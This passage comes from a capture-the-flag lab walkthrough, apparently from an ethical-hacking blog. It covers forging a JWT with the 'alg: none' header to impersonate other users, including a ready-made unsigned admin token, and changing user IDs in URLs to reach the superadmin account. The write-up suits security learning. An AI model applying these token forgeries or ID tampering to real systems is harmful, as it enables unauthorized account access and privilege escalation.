    If you remember, in the Header section I said that the alg can be whatever the algorithm is used and also it can be None if no encryption is to be used. Now, this should not be used when the application is in production but again the problem of misconfiguration comes in and make the application vulnerable to this kind of attack. The attack is that an attacker can log in as low privilege user says guest and then get the JWT token for that user and then decode the token and edit the headers to use set alg value to None. This would mean that no encryption has to be used therefore the attacker wouldn't need to the secret used for encryption.


    Let's see this method in practice. For this challenge visit the port 5000.

    It is a very simple login page and in that, you can log in via two users: user and user2. Now first let's try to login with the credentials of user:user . To do so first enter those credentials then click on the Authenticate button and then enable the capture in burp suite and then click on the Go button. In the burp tab, you should see a request to /protected and there you'll see the JWT token.

    Now take this JWT token and then you can decode it part by part.

    So if we decode the first part, which will do: {"typ":"JWT","alg":"HS256"}

    and decoding the 2nd part, we will get: {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":1}

    If you try to decode the 3rd part then you'll get some gibberish. But that is okay we only need the first and the second part.

    Now if we notice the identity value that is probably being used to identify the user but if you'll just edit that then it won't work because as I said the 3rd part is encrypted. So to bypass this we will make changes in the header as well as the value of the identity.

    Encode the following string with base64 and that will be our first part


    For the second part, we'll encode the following string:


    Notice how we changed the value of identity from 1  to 2.
    Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:


    Now open the developer's tools in your browser and edit the stored cookie of the website to this new one and then just press the Go button and you'll notice that it will prompt "Welcome user2: guest2".

    In a similar manner, you can try to play and find other users on the website.

    This kind of misconfiguration in the authentication system is common and could be exploited to escalate privileges or steal information.

    Our Method

    #1 Use the same method to find identity of admin user and retrieve the flag?

    1) First you open Burp

    2) set proxy in your browser

    3) Enable Intercept on burp suite and Login with user:user

    4) Then, copy this :- eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

    and replace with highlated mark and press forward button on burp suite

    Ans :-

    [Task 5] No Auth

    In this I am going to show you how a lot of systems don't even have proper authentication and their system is just left open for anyone to exploit it.

    A lot of time on websites we see that when we register a user and login with our credentials we are given a certain id which either is completely a number or ends with a number. Most of the time developers secures their application but sometime in some places, it could happen that just by changing that number we are able to see some hidden or private data.

    To test this go to port 7777. On that just create an account. Once the account is created visit your Private Space.

    As you can see in the image above the URL have /users/1. Try to change that value to 2 and we will get access to the admin account

    The chance of finding this kind of vulnerability is very low but it could be a very serious bug if you get lucky and found something like this.


    #1 Find the way to get into superadmin ad

    Ans :- No Answer Needed

    After Register and login Try With 0 :-

    #2 What is the password for superadmin account?

    Ans :- 

    #3 What is the flag you found in superadmin account?

    Ans :-

    Video Tutorial :






    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal

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